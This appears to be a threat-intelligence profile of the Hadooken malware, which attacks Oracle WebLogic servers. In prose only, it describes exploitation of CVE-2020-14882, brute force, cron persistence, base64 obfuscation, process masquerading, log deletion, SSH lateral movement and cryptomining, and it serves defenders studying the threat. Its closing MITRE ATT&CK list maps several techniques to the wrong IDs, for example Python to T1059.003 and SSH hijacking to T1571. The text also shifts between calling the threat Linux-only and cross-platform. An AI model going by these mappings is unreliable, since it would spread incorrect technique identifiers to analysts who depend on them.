Hadooken (Dropper) – Malware

Overview

The Hadooken malware is a sophisticated threat that has recently come to light, primarily targeting WebLogic servers running on Linux-based systems. Discovered by Aqua Nautilus researchers, this malware employs a multi-stage attack process that leverages common vulnerabilities, misconfigurations, and weak passwords to gain access to systems. Once the attacker infiltrates the WebLogic server, the malware executes a series of malicious actions, including the deployment of a cryptominer and the introduction of the Tsunami malware. The name “Hadooken” itself is likely a reference to the powerful attack move in the Street Fighter series, symbolizing the malware’s aggressive nature and its potential to wreak havoc on targeted systems.

WebLogic, an enterprise-level Java EE application server developed by Oracle, is widely used in critical business applications, including banking and e-commerce. Due to its widespread adoption in large-scale enterprises, WebLogic servers are frequently targeted by cybercriminals. In many cases, attackers exploit known vulnerabilities or misconfigurations, such as weak admin credentials or exposed consoles, to gain unauthorized access and execute remote code. Hadooken takes advantage of these weaknesses by leveraging brute force techniques and launching a chain of attack mechanisms aimed at compromising the server’s resources and spreading further within the network.

Targets

Information

How they operate

Initial Infection and Execution

Hadooken is typically introduced through the exploitation of a vulnerability in Oracle WebLogic servers, most notably the CVE-2020-14882 flaw. This critical vulnerability allows remote code execution via maliciously crafted HTTP requests. Once the attackers gain access to a vulnerable WebLogic server, they can deploy a series of malicious scripts to further compromise the system. The malware commonly uses PowerShell, Python, and Unix shell scripts to execute commands remotely. For example, it leverages a PowerShell script (b.ps1) that distributes secondary payloads, such as Mallox ransomware, to other compromised machines.

The malware’s versatility lies in its ability to switch between different scripting languages, making detection and analysis more challenging. This multi-script deployment is not only used to execute payloads but also to communicate with the command and control (C2) servers, ensuring that the malware can receive updates or new instructions in real time.

Persistence and Privilege Escalation

One of the key aspects of the Hadooken malware’s functionality is its ability to maintain a foothold within compromised systems. It achieves this persistence through various mechanisms, including the use of cron jobs. By setting up scheduled tasks, Hadooken ensures that it is re-executed at specific intervals (e.g., hourly or daily). This persistence mechanism is crucial for long-term campaigns, as it allows the malware to survive system reboots and other potential cleanup attempts.

Privilege escalation is another critical part of Hadooken’s operational strategy. The malware often exploits existing vulnerabilities to escalate its privileges within the compromised environment. This allows it to gain deeper access to systems, potentially bypassing restrictive access controls and escalating its ability to execute malicious activities across an organization’s infrastructure.

Defense Evasion and Obfuscation Techniques

Hadooken employs a range of evasion techniques to avoid detection by traditional security measures, such as antivirus software or intrusion detection systems. One of the key evasion strategies is obfuscation. The malware utilizes base64 encoding to obfuscate its payloads, making it difficult for security systems to identify malicious code through signature-based detection methods. In addition, Hadooken employs masquerading tactics, where it disguises its malicious processes as legitimate system tasks. For example, it often uses names like -bash or -java, making it appear as though the processes are benign when in fact they are executing harmful instructions.

The malware also focuses on removing traces of its presence by deleting logs and other artifacts that might indicate malicious activity. This tactic is part of a broader indicator removal on host strategy, aimed at erasing evidence of the attack to delay detection and forensic analysis. Such techniques allow the attackers to maintain control over the compromised systems without being noticed for extended periods.

Lateral Movement and Data Impact

Once it has established persistence and elevated its privileges, Hadooken attempts to spread laterally within the network. This is often done by leveraging SSH hijacking or exploiting weak credentials to gain access to other systems on the network. The malware can scan for and exploit poorly configured SSH keys or brute force login attempts, allowing it to propagate to other machines and maximize the impact of the attack.

In terms of impact, Hadooken’s primary objective is often to hijack system resources for cryptocurrency mining. This is achieved by deploying a cryptominer that consumes system resources to mine digital currencies, draining valuable computing power and potentially leading to performance degradation and system instability. Additionally, the malware’s infrastructure has been observed to support the deployment of ransomware payloads such as RHOMBUS or NoEscape, potentially encrypting valuable data on infected machines and demanding ransom payments from victims.

Conclusion

The Hadooken malware exemplifies the sophistication of modern cyberattacks. By leveraging a combination of exploitation, obfuscation, persistence, and lateral movement techniques, it poses a significant threat to enterprise networks. Understanding the technical operation of Hadooken provides security teams with the necessary insights to detect, mitigate, and ultimately defend against this evolving malware. The use of advanced evasion tactics, coupled with its ability to target both Windows and Unix-based systems, underscores the growing complexity of contemporary cyber threats and the need for robust, multi-layered security defenses.

MITRE Tactics and Techniques

1. Initial Access

Exploit Public-Facing Application (T1190): The attackers exploit vulnerabilities in Oracle WebLogic servers, such as weak credentials, to gain access and execute malicious code.

2. Execution

Command and Scripting Interpreter – Unix Shell (T1059.004): The malware uses shell scripts (e.g., the ‘c’ shell script) to execute commands and carry out malicious activities.

Command and Scripting Interpreter – Python (T1059.003): The ‘y’ Python script is used to download and execute the Hadooken malware.

Command and Scripting Interpreter – PowerShell (T1059.001): PowerShell script ‘b.ps1’ is used to distribute other malware (e.g., Mallox ransomware) on Windows systems.

3. Persistence

Create or Modify System Process – Cron (T1053.003): Hadooken creates cron jobs to ensure persistence by executing malicious payloads at regular intervals (e.g., hourly, daily, weekly).

4. Privilege Escalation

Exploitation for Privilege Escalation (T1068): The malware may exploit vulnerabilities or misconfigurations to escalate privileges during its execution.

5. Defense Evasion

Masquerading – Task or Service (T1036.005): The malware masquerades its cryptominer as legitimate system processes by using familiar names like ‘-bash’ or ‘-java.’

Obfuscated Files or Information (T1027): The malware uses base64 encoding to obfuscate its payloads and avoid detection.

Indicator Removal on Host (T1070): The malware deletes logs to erase traces of its malicious activity and avoid detection.

6. Credentials Access

Brute Force (T1110.001): The attackers use brute force techniques to guess weak passwords and gain access to the WebLogic administration console.

7. Lateral Movement

Remote Service Session Hijacking – SSH Hijacking (T1571): The shell script attempts to iterate through SSH keys and credentials to move laterally and spread the malware across the network.

8. Impact

Resource Hijacking (T1496): The malware deploys a cryptominer to hijack system resources for cryptocurrency mining.

Data Encrypted for Impact (T1486): While not explicitly observed in this case, the potential for ransomware deployment, such as RHOMBUS or NoEscape, suggests that the attackers may encrypt data for impact in future stages of the attack.

References

• Hadooken Malware Targets Weblogic Applications